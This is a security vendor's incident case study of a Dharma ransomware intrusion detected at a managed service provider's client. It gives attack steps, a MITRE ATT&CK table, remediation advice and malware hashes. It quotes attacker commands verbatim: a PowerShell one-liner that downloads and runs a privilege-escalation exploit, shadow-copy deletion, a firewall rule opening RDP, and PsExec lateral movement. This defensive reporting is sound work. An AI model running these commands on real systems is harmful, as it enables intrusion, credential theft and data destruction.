MSP Detects Ransomware at Service Industry Client

The Network: A well-known Managed Service Provider (MSP) specializing in infrastructure monitoring and management, disaster recovery, and security monitoring services uses Netsurion Managed XDR to provide SOC-as-a-Service (SOCaaS) capabilities to their end clients. The affected end client is in the services industry.

The Expectation: Prevention defenses, such as Anti-Virus (AV) software, are working and comprehensive monitoring and alerting is in place to rapidly detect threats that slip through the prevention layer. Netsurion Managed XDR platform provides Security Information and Event Management (SIEM) services, advanced endpoint protection, and behavior analytics to deliver added protection for the MSP’s clients. Rapid ransomware detection is crucial as it remains costly and time consuming to defend and mitigate.

The Catch: Detection of Dharma ransomware, a variant of the CrySIS ransomware family. Using Netsurion Threat Center, the SOC (Security Operations Center) team detected malicious process hashes on the host of the MSP’s client, where these hashes matched Indicators of Compromise of Dharma ransomware. The attackers stole user credentials of the client company via a brute-force attack or by tricking the user to enter credentials on a malicious URL. The attack was initiated by logging into the system from IP address 213.152.161.85, which uninstalled the AV, followed by a series of malicious process executions and lateral movement activity through Remote Desktop Protocol (RDP). Finally, the attackers cleared audit and other system logs to try unsuccessfully to evade detection.

The Find: By combining data from Netsurion Threat Center and our ISO-certified SOC, Netsurion detected many unknown (not seen previously) MD5 hashes where the hash reputation was poor. The detected hashes were matching to that of hashes used to launch Dharma ransomware. In use since 2016, threat actors behind Dharma ransomware continue to evolve and release new variants while using multiple attack vectors and decoy applications. Dharma ransomware leverages RDP on default port 3389 to connect to systems through stolen and compromised user credentials that allow hackers to gain access to sensitive systems and data. The cyber attackers used the tactics, techniques, and procedures (TTPs) below to infect the service industry client with ransomware.

Netsurion’s SOC observed the following attack sequence on the Client host:

1. Successful login to connect to system from blacklisted IP-213.152.161.85, originating from The Netherlands
2. Installed of Revo Uninstaller software to uninstall the anti-virus program “Webroot SecureAnywhere”
3. Installed of malicious .exe (IObitUnlocker.exe) for which the Netsurion SOC generates a new software install alert
4. Downloaded malicious file in C:\Users\<compromised Username>\Downloads\..
5. Used an Advanced Port Scanner to invoke mstsc.exe, to detect listening host on port 3389
6. Deleted Windows backups by running the vssadmin delete shadows /all
7. Downloaded many malicious files to location C:Users<compromised Username>Downloadsdriver
8. Netsurion Open XDR triggered an alert upon detection of the malicious file
9. Implemented critical software tools “mimilove.exe” and “mimikatz.exe” to gather password dumps
10. Used netsh command through command line to allow inbound RDP connections
    Command Line: netsh  advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389 action=allow
11. Attempted to login to multiple hosts with use of remote administration tools (PsExec.exe)
    Command line: C:\PS\PsExec.exe  \10.0.0.55 -u <domainname><Username> -p <password> cmd
12. Executed PowerShell to access “github” to exploit the vulnerability in IKE and AuthIP IPsec
    Command line: IEX (New-Object Net.WebClient).DownloadString(”https://raw.githubusercontent.com/itm4n/Ikeext-Privesc/master/Ikeext-Privesc.ps1”); Invoke-IkeextCheck -Verbose; Invoke-IkeextExploit -Verbose
13. Set the Microsoft Windows firewall to an OFF state, by the use of netsh command
14. Attempted to clear audit logs from the host to avoid traces of infection and to escape detection

Tactics in MITRE ATT&CK	Technique Name in MITRE ATT&CK	Commands/Processes Matching the Tactics and Techniques in MITRE	Brief Description	ID
Impact	Inhibit system recovery	vssadmin delete shadows /all	vssadmin.exe can be used to delete all volume shadow copies on a system	T1490
Credential access	Credential dumping	mimikatz.exe & mimilove.exe	Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords	T1003
Defense evasion	Disabling security tools	netsh.exe	netsh can be used to disable/enable local firewall settings	T1089
Execution	Service execution	PsExec.exe	Adversaries may execute a binary, command, or script via a method that interacts with Windows services.	T1035
Execution	PowerShell	Powershell.exe	Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell can also be used to download and run executables from the internet, which can be executed from disk or in memory without touching disk.	T1086

The Fix: Netsurion’s SOC promptly alerted the MSP upon the detection. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The collected hashes were then added to the Netsurion Threat Center repository to protect other customers and MSP’s clients. The security analysts also assessed whether other devices on the network were also infected. The comprehensive 24/7 monitoring quickly detected the ransomware threat. Finally, mapping the actual steps taken by the threat actor to the MITRE ATT&CK framework provides a holistic view of the risk, the Dharma adversaries, and how to effectively fight against these mutating threats.

The Lesson: Netsurion’s SOC provided remediation guidelines for the MSP to share with their end-user client. Recommendations to defend against ransomware attacks include:

• Organizations must implement strong password policies as well as least privilege policy (limit access to those with a true need to know)
• RDP: limit RDP access to specific IP addresses, potentially re-number the default port 3389 to try and evade scanning detection, and turn off Remote Desktop Services if they are not needed
• Educate users at all levels regarding cybersecurity best practices, especially on phishing emails and social engineered threats
• Regularly perform data backup in case information recovery is needed as a last resort
• Implement comprehensive monitoring and alerting of servers and workstations for advanced threat detection

File Name	File Path	MD5 Hash
IObitUnlocker.exe	C:\Program Files\IObit\IObit Unlocker\ IObitUnlocker.exe	D166261F5138AB859F03813992C37687
PS.exe	C:\Users\frankjr\Downloads\PS.exe	54daad58cce5003bee58b28a4f465f49
kprocesshacker.sys	C:\Program Files\Process Hacker 2\kprocesshacker.sys	6365FE1D37545C71CBE2719AC7831BDD
NS.exe	C:\Users\frankjr\Downloads\driver\NS.exe	869420f42c9448924f935e5c1e2d9949
del32.exe	C:\Users\frankjr\Downloads\driver\del32.exe	902B500F4FA08C9741695931A6ACAD3C
ph_exec.exe	C:\Users\frankjr\Downloads\driver\ph_exec\ ph_exec.exe	3f20caeef00bf0ca5d3d0537e9929692
NS2.exe	C:\Users\frankjr\Downloads\driver\NS2.exe	597DE376B1F80C06D501415DD973DCEC
ikea32.exe	C:\Users\frankjr\Downloads\driver\ikea32.exe	649BA005BF09C1A0C4EE1100060997A6
log32.exe	C:\Users\xxxx\Downloads\driver\log32.exe	2719851205efad370b74144332e977f2
zam32.exe	C:\Users\xxxx\Downloads\driver\zam32.exe	33f34f691bbd4d19a801aa36f053ed2b
del32.exe	C:\Users\frankjr\Downloads\driver\del32.exe	902b500f4fa08c9741695931a6acad3c